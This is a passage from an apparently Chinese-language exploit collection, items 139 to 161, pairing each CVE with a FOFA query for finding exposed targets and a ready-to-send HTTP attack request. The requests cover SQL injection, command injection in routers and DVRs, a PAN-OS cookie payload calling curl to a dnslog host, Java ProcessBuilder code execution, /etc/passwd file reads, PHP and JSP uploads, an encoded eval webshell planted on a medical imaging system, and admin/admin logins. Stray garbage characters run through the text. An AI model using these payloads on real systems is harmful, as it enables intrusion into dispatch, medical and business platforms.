; W0 [0 G9 N6 ]6 d8 g4 z6 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 L0 F+ \0 d% Z2 l
Accept-Encoding: gzip, deflate, br z! f0 [: U+ n- J1 ]" F% [
Connection: close
. T3 w# T, l3 Y& v! _- @Upgrade-Insecure-Requests: 1 Q# N! p" k! J! m
: z6 k- \# J' w2 Y/ O/ c) {, _- h( f4 B3 I4 H! [+ Q2 R& W) t+ @
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 p8 J' t' K2 Z5 Y0 D: VCVE-2024-2622
]. g3 B% W6 Q4 C4 oFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 U; [: s% L2 t0 ~2 hGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
9 @ G5 I r* rHost: x.x.x.x
0 ?/ j6 s* H! P- c* zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( W: k1 K5 P* U, S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* e0 p4 ?% s) a4 ]4 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! j$ t/ g6 V+ ^; p9 u% B6 O7 O+ BAccept-Encoding: gzip, deflate, br4 D9 o* }* S* U6 p# Z4 t' w
Connection: close3 K; w1 _! j4 g3 ~& S# k! R
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk% A- t7 B+ _- Z' V/ L. P$ \
Upgrade-Insecure-Requests: 1 C1 N$ y9 W' H' Y# i
& `& x+ I1 r, n
3 ~% X5 e6 k6 P* r. h140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. l+ ~7 o& J7 `3 k
CVE-2024-2566
J# T3 b' E) b X: F4 uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" U/ C3 ^1 i. @2 }: c1 Q
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
" k! s; D4 M3 u% v+ F' CHost: x.x.x.x
6 G8 U, ^/ O- n, Z% ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 L- v9 F1 O9 v8 Q7 B; o) s+ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( d O" Q; n7 N T2 a, f, x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ r! x3 J7 H! f2 G
Accept-Encoding: gzip, deflate, br/ \4 A+ t( s C1 f! m
Connection: close
$ ]0 G5 Z. }6 ?8 f9 u* A( V, GCookie: authcode=h8g9
" d9 S4 O$ d! f: A2 |3 K' o0 kUpgrade-Insecure-Requests: 1$ _4 k4 h& n& ^2 h' R* B' R
8 U8 a/ n1 e; R% T0 ]- \* q6 i$ H8 _8 Z
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入 {5 P4 `+ w2 o+ r
FOFA:body="指挥调度管理平台"1 v5 p2 l @$ g1 S
POST /app/ext/ajax_users.php HTTP/1.1& p& h, P- Q/ F( R
Host: your-ip
: Z& T0 v3 s6 O. m( EUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
: X2 j6 y3 @( [! z4 |Content-Type: application/x-www-form-urlencoded
5 z; K; ~% `, g/ J
1 M0 m% l* t5 P7 L8 U; G
3 b+ L" K8 \ l. Y! Ddep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -/ t- I! b, N6 R2 ?) m0 N7 X
6 I$ U `8 w" z5 e' ]) e
. q' c' L( E: z- J& y7 O142. CMSV6车辆监控平台系统中存在弱密码0 D5 S4 y/ i& X) U0 i
CVE-2024-29666
6 F7 j z9 G8 k/ d2 w: N5 e( `FOFA:body="/808gps/"
0 e q" Q8 z7 r6 f' B+ M1 Kadmin/admin
t# z' T9 g4 L4 A1 b f+ [143. Netis WF2780 v2.1.40144 远程命令执行
5 z% S1 V9 Q" N" F) f/ a, ACVE-2024-258505 I( B1 F3 A0 |) C
FOFA:title='AP setup' && header='netis'8 s# @* I, R9 o. s! } g# Q. ~ g
PAYLOAD
% Y4 Y3 ]1 j/ L
- e& }# m, M, o m144. D-Link nas_sharing.cgi 命令注入
. p! B7 Q# ]8 v# u& C6 L: SFOFA:app="D_Link-DNS-ShareCenter"' n) C7 i a4 \) S2 Z3 a. v
system参数用于传要执行的命令
7 E* D; A D3 `, h4 e9 z/ q; a- [GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
) p9 ]% p* K" {5 J2 }Host: x.x.x.x, d( l/ z5 h- `' q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
& Y9 [: u c: ]7 w1 kConnection: close: X7 G1 j3 E. Z {( h# ^: f
Accept: */*/ x1 _% {* P' P7 H# r( L& z
Accept-Language: en2 l ^/ ?: n; }' M3 t$ X
Accept-Encoding: gzip+ O0 S2 S$ b5 h9 G; Z0 J
/ h, ~9 Q- b& f$ y' ]/ ]2 ~
' ^, e/ ~4 y" v1 O145. Palo Alto Networks PAN-OS GlobalProtect 命令注入- v5 F! u8 @6 v; N
CVE-2024-34001 E( M! K7 u$ T: n, J% {: v
FOFA:icon_hash="-631559155"
" @& @0 u5 J6 J7 B$ ~& _* t6 NGET /global-protect/login.esp HTTP/1.1
- d. ]' u6 Q$ w; jHost: 192.168.30.112:1005, B( F; `1 u6 n- v/ s, c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.842 n4 J; r# k0 _% _% e: L
Connection: close( a8 x R9 S2 \! A; V g
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;0 `/ V. @ z( Z5 E5 b
Accept-Encoding: gzip
0 V+ J" S- w* E+ M, Y. T+ k0 ?1 A, W
8 H1 f4 f- g+ \) m) `+ {& p' a4 E
2 x- Y7 I* J3 h, u3 m+ n" d0 |1 b146. MajorDoMo thumb.php 未授权远程代码执行1 }" g& m+ Q9 V/ I6 O9 C, h% d
CNVD-2024-021756 t j2 g8 M$ N0 |
FOFA:app="MajordomoSL"7 s$ W1 l# Y( ] |( c4 m4 z
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
9 t2 C. Q# h8 w9 V8 S2 yHost: x.x.x.x% d+ a9 B! ]' _1 }5 C3 y9 U2 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: d0 V8 M) w5 [6 x
Accept-Charset: utf-84 }7 U8 m$ V4 n* r8 s9 j/ \& |
Accept-Encoding: gzip, deflate
7 M. {2 H. Q+ |& BConnection: close" w" _% K+ B. e- D0 p3 d
- j8 T- x! W$ Y6 v8 Q/ Q( t6 ~" K5 A
" ?# P6 M+ {' N$ t* K; Z" W147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
. N) V, \+ H7 [+ _ Q4 k/ w& n# h) zCVE-2024-32399
, Q- D/ A- Y+ b: C! AFOFA:body="RaidenMAILD"' a+ X" P( ~7 w. N" O
GET /webeditor/../../../windows/win.ini HTTP/1.12 A" ^# }2 K9 ^& E. R$ |% A: x5 s
Host: 127.0.0.1:811 u, w4 H6 t; `3 l0 H9 R
Cache-Control: max-age=0
8 i1 C1 c0 `) ^2 i2 `! PConnection: close# t h, \1 ^9 ?. a) m. C: K2 m
. i: h1 k+ p1 c+ A! \0 `! T+ u, m' W- V+ p2 z% y d0 x
148. CrushFTP 认证绕过模板注入
6 v, e5 W+ Q; ACVE-2024-4040" |4 d+ K% h: y- f: ?
FOFA:body="CrushFTP"
; u" Z2 c0 M9 m) yPAYLOAD. \! J" o# D2 p+ { B+ G
% ]9 ^8 y) e+ J. s# E5 b0 G
149. AJ-Report开源数据大屏存在远程命令执行3 S% Y5 w3 @+ S$ ]* N7 w
FOFA:title="AJ-Report"
7 o+ H: N" K' P5 z7 }: v/ j F: n! J. k6 c8 h+ @2 \9 g6 p
POST /dataSetParam/verification;swagger-ui/ HTTP/1.10 f0 {3 r' _' B
Host: x.x.x.x3 y$ o9 E3 Y, m# L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% h& s( Z$ B* Y7 ]& S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 [* ]# W" v- F: i3 F4 v7 r/ iAccept-Encoding: gzip, deflate, br3 D# Q% u+ a: l( z3 d
Accept-Language: zh-CN,zh;q=0.9
/ W( Y0 b. H. s) l2 n+ d0 oContent-Type: application/json;charset=UTF-81 p% P( h4 _! t6 Q
Connection: close
. A9 q. |% T; P" c
2 H* a1 \3 q9 c- w' ~2 \- {{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}5 y, k& K7 y! m" G* }4 m
: F) ]; B1 h& T" j2 r3 u$ A. @
150. AJ-Report 1.4.0 认证绕过与远程代码执行/ G0 |9 X( s! U+ |
FOFA:title="AJ-Report"/ k) D& u/ f$ d4 U4 p1 L# S
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1) _! v. R& V/ y; p, D6 C
Host: x.x.x.x$ c' g! r0 L* \5 s7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* |* ` T) v% {1 |# B+ oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 q \" r4 ]1 n; c' C2 y" o! d" XAccept-Encoding: gzip, deflate, br9 Q! ?/ W* q, ]% {0 W1 O7 H
Accept-Language: zh-CN,zh;q=0.9
' T5 d, g8 Y' `' X o# |- z# n3 e. xContent-Type: application/json;charset=UTF-8
2 U7 Z' X/ H. j" d- L$ ?Connection: close' x0 R5 T1 w" o1 ~, C5 X
Content-Length: 339
6 N4 Z/ j j5 `; S( n) q) U$ x4 v9 A. A- V: E' t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* u. m# d3 ^/ G) @: |) ?* l
2 y& L8 J: {0 M" N, Y/ S% E4 ?) n; @% h
151. AJ-Report 1.4.1 pageList sql注入" c/ w3 ]6 i J% e. j* U- {& M+ N( l
FOFA:title="AJ-Report"
* i/ z8 l8 |) { yGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' F& v% f! Y, E5 H: Q' s3 @Host: x.x.x.x* i" _. {+ o9 D% u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 W' y$ z8 }9 \# V. M' a3 UConnection: close5 B% }9 x4 V& i- i. L/ X
Accept-Encoding: gzip: E$ ~, U) Z# t7 S2 ^' |3 a5 k
3 j# F9 M' i# n0 U3 v( c5 f1 J7 c9 H5 Z4 c+ u8 V, x& f% c \% o5 d/ C
152. Progress Kemp LoadMaster 远程命令执行7 L5 r# G0 f, L0 p
CVE-2024-1212
$ Q4 c {& c3 x- _LoadMaster <= 7.2.59.2 (GA)
2 Z" p6 E: A0 s! Z6 RLoadMaster<=7.2.54.8 (LTSF)+ D% h; f# X9 s# ^- Z* Q$ i
LoadMaster <= 7.2.48.10 (LTS)
2 K1 z% N, a! H2 k6 Z: p2 N3 @6 [: oFOFA:body="LoadMaster"
6 s$ R6 A* U: W) G0 M( m' `JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
u- g: x0 z( q- W! mGET /access/set?param=enableapi&value=1 HTTP/1.17 k' B- v" f% c+ O' L, b/ L
Host: x.x.x.x& s! h6 x$ Q& x2 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
8 M# c' {" {6 v$ S, R4 L$ C; r& EConnection: close4 v/ {: h" w+ g- i/ B8 k; \0 N+ V1 Q: \
Accept: */*
1 }; j, a0 J# h( e# B- n& N! hAccept-Language: en2 g# ]% t8 A* f% f' O6 |, S
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
! ]. a( x- F% |& s) f( `$ u9 DAccept-Encoding: gzip
& [' f6 D7 I! K" C1 m' D
# O6 f2 c' O( ^$ ]6 B6 H0 n5 {1 m7 V' j
153. gradio任意文件读取
/ l" b# v& @4 h; T# JCVE-2024-1561FOFA:body="__gradio_mode__"
8 a% p& e) Q% p8 i- Z& Z第一步,请求/config文件获取componets的id; |* B; _" E6 P" B! N
http://x.x.x.x/config- d2 ^9 k- K0 s- u/ M
4 K# a3 a$ a7 U& C4 r3 O6 ]) O6 a* p
% y& T2 J# v' ~3 e. g( }
第二步,将/etc/passwd的内容写入到一个临时文件
9 J0 |) c ]+ n' X6 h/ @* \& TPOST /component_server HTTP/1.1
! b" l l$ q9 H, j# A6 ZHost: x.x.x.x/ K! J% x! B: \( U* F7 j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
. o: [" H9 p9 H" j8 T2 t5 Y4 gConnection: close3 {' T. C$ T/ S" f! V1 c7 ?* w
Content-Length: 115
9 ~- T9 r8 i0 T( DContent-Type: application/json
2 [; h# u: q5 x& j" L$ mAccept-Encoding: gzip& \* n! }; h3 a0 T' M$ Z6 o
* h. ]' { |: l9 c{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}5 u& L2 _" Y7 _4 ]2 s! v6 G
5 S. l6 o1 ?: ^* j. V M$ @4 N+ ^ }7 p% J1 j0 U6 {4 V. G- e+ ^. R* U
第三步访问
+ [% R- A- K* _+ s4 Uhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
0 [ O. z, D% E3 s1 j5 _* l' Z3 `
3 E3 g% P+ R/ ]# V6 ~* h$ B) m
$ J7 F5 N! k' _* F# Z154. 天维尔消防救援作战调度平台 SQL注入- P% `/ ~) ?- R' B8 {
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
! W5 {/ a' j! o. V$ a& k* i7 ~POST /twms-service-mfs/mfsNotice/page HTTP/1.1
' p& I' ?, q) }; O) J7 wHost: x.x.x.x
9 A, R0 ?. S4 Y- VContent-Length: 106
$ s* Q2 C, k- z; S. h0 RCache-Control: max-age=0. c1 J! w9 a7 Q0 A* f8 j; \
Upgrade-Insecure-Requests: 1
7 t) ` g/ h+ z) T! a/ ROrigin: http://x.x.x.x }) [2 A3 B# ^9 L* j7 I
Content-Type: application/json
; |5 J7 c6 Y* S- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* y, Z& b3 x2 j" }) e, X5 L! l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 H# ?! `0 P) v7 T- e2 q7 oReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
" N8 `+ M4 K, ^# s+ eAccept-Encoding: gzip, deflate/ u3 d$ f' z- |: g4 ^0 ~
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7) O( b3 R0 \8 ^; U# m: f
Connection: close
8 y2 v k5 }) ^8 d g" ` l# c' x3 W5 K9 F, ?" u
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
' ?2 l" {' f6 t$ Y8 Z2 `; X( C( V1 P) D, e) n4 r' e# m% {2 p
! ~9 y( i q' ^, h V: `5 ]# s
155. 六零导航页 file.php 任意文件上传
7 z% w# X. e/ \: L$ P( l, Z/ e' L. bCVE-2024-349826 Y0 H: l+ z) U$ q8 x2 o* K) }+ A
FOFA:title=="上网导航 - LyLme Spage"
8 d) i- Z: u- T' KPOST /include/file.php HTTP/1.1
/ J3 r0 e# ?; z( z! x% {- aHost: x.x.x.x7 w5 I( j& D+ E2 q# A4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& q: D9 i7 G3 J. b3 c9 \Connection: close* }) j! S: m# l0 [, r
Content-Length: 2324 G2 T4 B* }; ]2 O" z9 Z
Accept: application/json, text/javascript, */*; q=0.01
4 M( C* b8 W& [" c Q! p- eAccept-Encoding: gzip, deflate, br9 R, W& c$ f/ o* ?) s7 I8 A+ B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 l3 I0 L. ^4 \9 [; R! r! q# ?Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
3 c2 p/ p/ Q( W/ O3 BX-Requested-With: XMLHttpRequest
8 f( f/ o" } {$ e' ~1 Y
! R$ y7 }; e9 a6 N( }-----------------------------qttl7vemrsold314zg0f5 B: R8 V/ A& Q1 _
Content-Disposition: form-data; name="file"; filename="test.php"
9 f' V3 |/ n$ d( BContent-Type: image/png
1 b/ {+ b) @7 A6 Y1 X' d, @- b" u$ t3 b0 U+ J3 W6 J5 P
<?php phpinfo();unlink(__FILE__);?>
, j7 A/ C2 n6 p) j2 p! i-----------------------------qttl7vemrsold314zg0f--
1 K& S n; @' y$ l- Q, ~% X% K2 G, C' K/ Q% e
$ |5 u, V/ `; M: a
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
3 I% O- {; T; @ g( d" ]9 ], w. K" O' \' J$ F: Z5 N8 `& C
156. TBK DVR-4104/DVR-4216 操作系统命令注入1 | q% W9 F1 k" ~
CVE-2024-3721
6 B# H1 e4 q7 I1 } z6 ~FOFA:"Location: /login.rsp"
+ n2 i8 V, \# N# ^·TBK DVR-4104& ~ v8 w0 O" G7 F% y0 c) B- |
·TBK DVR-4216
2 G1 k/ |3 \) R0 Y4 ? ]" Y. pcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"1 x) V8 }: K6 u/ ^
; e4 E `' h; W$ ?# p
+ P, ]2 t7 R2 J8 ?POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
( ? n( k0 W$ c4 L0 R: ZHost: x.x.x.x
) w0 B& O- Z: G' Z" }7 M2 i9 GUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; L; u: @3 @9 |9 |Connection: close
3 q" n: t3 U% _Content-Length: 02 V$ G& z. }3 N( X3 l, ^
Cookie: uid=1" J. C2 n0 u( L4 m3 |
Accept-Encoding: gzip. F; D6 }1 y5 ^6 f# t. H
; L' D3 u1 ^: j. ^- R8 Z
4 m, R8 ?0 L* C+ S
157. 美特CRM upload.jsp 任意文件上传
- c& W- [9 p& S4 QCNVD-2023-06971
. |2 b1 `) B; u- G; Q& xFOFA:body="/common/scripts/basic.js"( w6 B4 a$ a' ~+ A2 d9 E8 y
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
9 j8 a& g9 g# x4 E0 S, IHost: x.x.x.x
* h5 I+ J0 [ d6 P$ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36* \3 O/ `9 [0 T& t- p
Content-Length: 709& k/ z8 ^- c, [% l" o6 N1 G& G3 h* V$ m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* M/ A3 G4 w( M8 U2 B
Accept-Encoding: gzip, deflate
- u9 U7 A Y) S; o, p" fAccept-Language: zh-CN,zh;q=0.9
) _) l4 m: B) p: l S- PCache-Control: max-age=0% g: Q: l8 N0 s
Connection: close9 N2 U. ~6 }9 S' F# r8 T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN" i U- k/ \6 q; H
Upgrade-Insecure-Requests: 1+ D& D, F3 U, P& K( c' H
3 s( ?* ]# S, J------WebKitFormBoundary1imovELzPsfzp5dN$ Q! a! {( `# a ~9 L6 m
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"0 y2 e# J% q. Y# H$ T
Content-Type: application/octet-stream, T: y. w- x- I4 ^9 i/ I
9 f$ U4 B- X* D) Q
nyhelxrutzwhrsvsrafb
* W/ U) I2 ?7 t1 c5 B------WebKitFormBoundary1imovELzPsfzp5dN8 S( i B f# k" P, |- X, p
Content-Disposition: form-data; name="key"
% C- m0 I7 @5 q# q. w+ N' y S m1 l; a+ i, ?; P
null
M# M0 A, |( d5 X$ v------WebKitFormBoundary1imovELzPsfzp5dN
0 d* e6 t+ N9 e H) AContent-Disposition: form-data; name="form"8 u3 w1 n: C* D" \" V1 w+ G
5 f) e- T9 n" U( T$ C0 V+ xnull
/ M2 u/ I O8 b( C. B/ d. M. t3 r) R n------WebKitFormBoundary1imovELzPsfzp5dN
/ C1 ]# [0 r1 `Content-Disposition: form-data; name="field"/ G+ M* m/ {% f4 Z6 J0 x$ a! p' W
! p* x9 [0 ]4 Z
null
' L+ G# p" O# J------WebKitFormBoundary1imovELzPsfzp5dN
+ {+ C4 D$ p0 k" t0 rContent-Disposition: form-data; name="filetitile"
6 j) f1 B& Y. J) W7 q. Q. p; |+ M' a- n, {
null
5 R$ e7 k1 C: }9 w# x* \------WebKitFormBoundary1imovELzPsfzp5dN
) ^, I& e' }6 |7 T! TContent-Disposition: form-data; name="filefolder"
+ b0 C* a5 ], _$ Y6 w' D5 _
* z3 J$ P$ O4 ?# T- X! {8 Z# [null
m) n- l& @8 i3 l9 t K------WebKitFormBoundary1imovELzPsfzp5dN--6 r7 _2 }/ _. e7 b
& }, Z+ L x! E/ D( d
7 M6 k; ~" G- e* a5 y; B3 |6 x. y
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
4 U! `! _$ O5 i" ]0 b! N: p+ g5 Q
2 R7 D+ @( n' U2 {! D2 g) H# {. n158. Mura-CMS-processAsyncObject存在SQL注入/ g5 M- ?# E: y4 s, g
CVE-2024-32640
& N* [% u3 z9 s8 e4 B/ o" ]3 V' iFOFA:"Generator: Masa CMS"
% r% W2 t9 w m: w, F5 J5 CPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.18 N; |: v! T5 b! {
Host: {{Hostname}}. L. d; l1 t4 f0 U. T# Y1 X" P
Content-Type: application/x-www-form-urlencoded
" K# D, ?2 o) x) z4 Q
, I% z% W' G0 Q2 J1 U6 |object=displayregion&contenthistid=x\'&previewid=13 v' e# M' O9 B4 J
% n8 A+ {9 L1 [0 {
0 b3 A; c( m" i1 j$ |/ i159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
2 l. B! Z7 X; j xFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
/ a6 g7 R- B0 S3 A1 W; z- iPOST /webservices/WebJobUpload.asmx HTTP/1.1# M- f/ m# _! ~3 d1 c7 E! ]4 a7 `! ?
Host: x.x.x.x
6 J7 x4 q2 \2 @$ z# P3 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. s% @4 @2 D3 H% G$ E4 E3 U0 T& W
Content-Length: 1080 |( c) {- i0 p) R0 t
Accept-Encoding: gzip, deflate
" a# c3 u5 M" [Connection: close
6 o0 ?6 j* J9 ]) e; H AContent-Type: text/xml; charset=utf-80 Q: x$ N& Y' c* O; f
Soapaction: "http://rainier/jobUpload"
' l+ q1 J, X m% t0 `5 N; x) e- w( Z$ k+ A
<?xml version="1.0" encoding="utf-8"?> Q% l; F1 O9 @$ G
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
7 a( B7 J1 m$ D7 `" n% d<soap:Body>; P8 o2 P; Z8 Y( w
<jobUpload xmlns="http://rainier">3 J5 w" d$ d! `' \
<vcode>1</vcode>
5 Y$ ?9 _) { S<subFolder></subFolder>
' m ^1 r7 B7 ?, r1 v; i<fileName>abcrce.asmx</fileName>
z8 v* ?5 Z3 E0 }+ f2 N+ M4 E6 D<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>+ Z; s8 k6 `: K% T O7 b: _& s
</jobUpload>& q: P7 J7 h @6 W' n
</soap:Body>
( X+ j" O8 }& N* k</soap:Envelope>
1 H5 o4 a3 k& h O2 I2 A+ p6 l. p8 s$ \- U
8 H+ }" D6 u( h0 H% E/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")4 r, \& M9 o: y# H# {" m! J
7 i4 o/ w: e9 t C0 i' I
- X7 q: N# o; c; V2 d
160. Sonatype Nexus Repository 3目录遍历与文件读取
7 X: L; N; K! F6 g% ]. eCVE-2024-49562 m- Q, f/ _, [' v! h
FOFA:title="Nexus Repository Manager"/ l7 c) `8 ? [( ]$ y
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
/ m/ n$ I. U# W d# _- a# EHost: x.x.x.x, |0 G( }6 _0 \3 w4 w; K
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
4 M1 T2 f% v! C3 f$ i) a: PConnection: close( b; e5 ^' g4 x$ q% w
Accept: */*3 `( `& S+ Q& W$ R3 Z
Accept-Language: en9 P6 q$ [7 k2 [! ], O: D- N
Accept-Encoding: gzip
# W6 {* B6 ~ t% l$ `0 {
. ?6 L$ n+ x" `$ i% k/ L
) n( I" z% m6 ]9 O161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
% D! y/ D/ |( X, Y( b; @: AFOFA:body="/KT_Css/qd_defaul.css"
' L+ b% B4 s6 H第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密$ C0 A3 q& c0 j6 x
POST /Webservice.asmx HTTP/1.1
